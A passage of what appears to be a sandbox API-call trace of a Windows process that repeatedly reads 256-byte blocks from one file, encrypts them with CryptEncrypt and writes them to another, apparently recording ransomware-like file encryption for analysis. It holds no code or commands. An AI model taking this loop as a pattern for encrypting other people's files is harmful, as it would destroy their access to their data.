(in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.565] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.566] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.566] GetLastError () returned 0x0 [0167.566] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.566] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.566] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.566] GetLastError () returned 0x0 [0167.566] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.566] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.566] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.566] GetLastError () returned 0x0 [0167.566] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.566] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.566] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.566] GetLastError () returned 0x0 [0167.566] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.566] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.566] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.566] GetLastError () returned 0x0 [0167.566] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.566] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.566] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.566] GetLastError () returned 0x0 [0167.566] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.566] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.566] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.566] GetLastError () returned 0x0 [0167.567] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.567] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.567] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.567] GetLastError () returned 0x0 [0167.567] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.567] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.567] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.567] GetLastError () returned 0x0 [0167.567] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.567] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.567] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.567] GetLastError () returned 0x0 [0167.567] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.567] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.567] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.567] GetLastError () returned 0x0 [0167.567] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.567] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.567] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.567] GetLastError () returned 0x0 [0167.567] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.567] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.567] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.567] GetLastError () returned 0x0 [0167.567] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.567] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.568] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.568] GetLastError () returned 0x0 [0167.568] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.568] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.568] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.568] GetLastError () returned 0x0 [0167.568] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.568] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.568] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.568] GetLastError () returned 0x0 [0167.568] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.568] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.568] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.568] GetLastError () returned 0x0 [0167.568] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.568] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.568] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.568] GetLastError () returned 0x0 [0167.568] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.568] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.568] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.568] GetLastError () returned 0x0 [0167.568] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.568] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.568] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.569] GetLastError () returned 0x0 [0167.569] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.569] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.569] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.569] GetLastError () returned 0x0 [0167.569] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.569] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.569] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.569] GetLastError () returned 0x0 [0167.569] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.569] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.569] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.569] GetLastError () returned 0x0 [0167.569] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.569] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.569] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.569] GetLastError () returned 0x0 [0167.569] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.569] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.569] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.569] GetLastError () returned 0x0 [0167.569] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.569] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.570] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.570] GetLastError () returned 0x0 [0167.570] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.570] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.570] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.570] GetLastError () returned 0x0 [0167.570] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.570] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.570] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.570] GetLastError () returned 0x0 [0167.570] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.570] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.570] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.570] GetLastError () returned 0x0 [0167.570] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.570] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.570] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.570] GetLastError () returned 0x0 [0167.570] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.570] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.570] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.570] GetLastError () returned 0x0 [0167.570] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.570] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.570] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.570] GetLastError () returned 0x0 [0167.570] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 